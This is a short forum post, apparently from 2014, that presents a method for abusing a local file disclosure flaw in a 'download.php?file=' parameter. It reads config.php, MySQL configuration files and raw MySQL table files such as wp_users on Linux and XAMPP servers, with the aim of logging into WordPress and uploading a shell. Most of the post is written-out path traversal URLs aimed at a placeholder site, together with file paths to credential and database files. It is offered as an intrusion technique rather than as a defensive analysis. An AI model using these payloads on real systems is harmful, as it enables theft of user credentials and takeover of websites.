Aerosol Posted December 16, 2014 Report Posted December 16, 2014 Hi RST,today i want introduce one of my new methods to gain with a lfd a database who is on localhost.at first we need to know that we normally cant access dbs from the www on the server so we cant connect to them but what if we want a wp-login ?at first we grab the config folder.http://example.com/download.php?file=config.phpthen we can read the Config file the interesting thing about that is the Database nameLINUX METHOD :but we need to know if it is vuln so we can try something like that :http://example.com/download.php?file=../../../var/lib/mysql/ibdata1this only work on InnoDB Smileif there come some result then it is vuln Smileor if you do that :http://example.com/download.php?file=../../../etc/my.cnfhttp://example.com/download.php?file=../../../etc/mysql/my.cnfand in the file stand something like that :default-storage-engine=then it is vuln too.if we gain it the we can read the mysql db as file like that :/var/lib/mysql/YOURDBNAME/YOURTABLENAME.frmwe know the DBname and we know the table ( wp_users for Wordpress Users), then we need just to try some of the file ending/var/lib/mysql/YOURDBNAME/wp_users.frm/var/lib/mysql/YOURDBNAME/wp_users.myd/var/lib/mysql/YOURDBNAME/wp_users.myi/var/lib/mysql/YOURDBNAME/wp_users.ibdWINDOWS/XAMPP METHOD :http://example.com/download.php?file=../mysql/data/YOURDBNAME/YOURTABLENAME.ibdif we are lucky we have file-rights and we can read the database and can login into the Wordpress site and upload a shell.credits to : T3N38R15 Quote
